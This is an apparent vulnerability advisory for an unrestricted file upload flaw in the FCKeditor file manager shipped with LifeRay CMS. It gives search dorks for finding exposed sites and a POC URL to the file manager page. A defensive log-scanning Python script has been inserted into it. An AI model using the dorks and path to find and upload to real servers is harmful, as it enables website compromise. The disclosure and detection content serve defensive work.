[+] Title: LifeRay CMS (Fckeditor) Arbitrary File Upload Vulnerability
[+] Date: 2020/04/10
[+] Author: h4shur
[+] Team: Persian Security Group
[+] Vendor Homepage: www.liferay.com
[+] Software Link: www.liferay.com
[+] Tested on: Windows 10
[+] Category : Web Application Bugs
[+] Dork : inurl:/web/guest/
inurl:/html/js/editor/fckeditor/
### Notes:
The FCKeditor file manager shipped with LifeRay allows an attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Unrestricted file upload of this kind is a significant risk to the application.
### POC:
[+] http://site/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
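To check whether this file manager is being reached on your own server, the following added example (not part of the original advisory) scans access-log lines for requests under the path from the POC. The log format (common/combined), the status-based labels, and the sample lines with their placeholder connector path are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Path prefix taken from the POC URL above; compared in lower case because
# some servers resolve paths case-insensitively (assumption).
FILEMANAGER_PREFIX = "/html/js/editor/fckeditor/editor/filemanager/"

# Common/combined log format: ip ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(line):
    """Return (ip, label) if the request touches the file manager, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m["path"].split("?", 1)[0].lower()
    if not path.startswith(FILEMANAGER_PREFIX):
        return None
    served = m["status"].startswith("2")
    if m["method"] == "POST":
        # A 2xx POST under this prefix means the server accepted a write-style request.
        return m["ip"], "possible-upload" if served else "post-denied"
    return m["ip"], "browser-reachable" if served else "probe-denied"

def summarize(lines):
    """Group labels per client IP, preserving request order."""
    out = defaultdict(list)
    for line in lines:
        hit = classify(line)
        if hit:
            out[hit[0]].append(hit[1])
    return dict(out)

# Constructed sample lines: documentation IP ranges, placeholder connector path.
SAMPLE = [
    '198.51.100.7 - - [10/Apr/2020:10:00:01 +0000] "GET /web/guest/home HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Apr/2020:10:00:05 +0000] "GET /html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html HTTP/1.1" 200 2048',
    '203.0.113.9 - - [10/Apr/2020:10:00:09 +0000] "POST /html/js/editor/fckeditor/editor/filemanager/CONNECTOR-PLACEHOLDER?x=1 HTTP/1.1" 200 310',
    '192.0.2.44 - - [10/Apr/2020:10:02:00 +0000] "GET /HTML/js/editor/fckeditor/editor/filemanager/browser/default/browser.html HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    for ip, labels in summarize(SAMPLE).items():
        print(ip, labels)
```

Any "browser-reachable" or "possible-upload" result means the file manager is served to unauthenticated clients and should be blocked or removed at the web server.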
### Demo:
### Special Thanks:
* Po0ri4 & b4ckdo0r
### Contact Me :
* Telegram : @h4shur
* Email : h4shursec@gmail.com
* Instagram : @netedit0r
* Twitter : @h4shur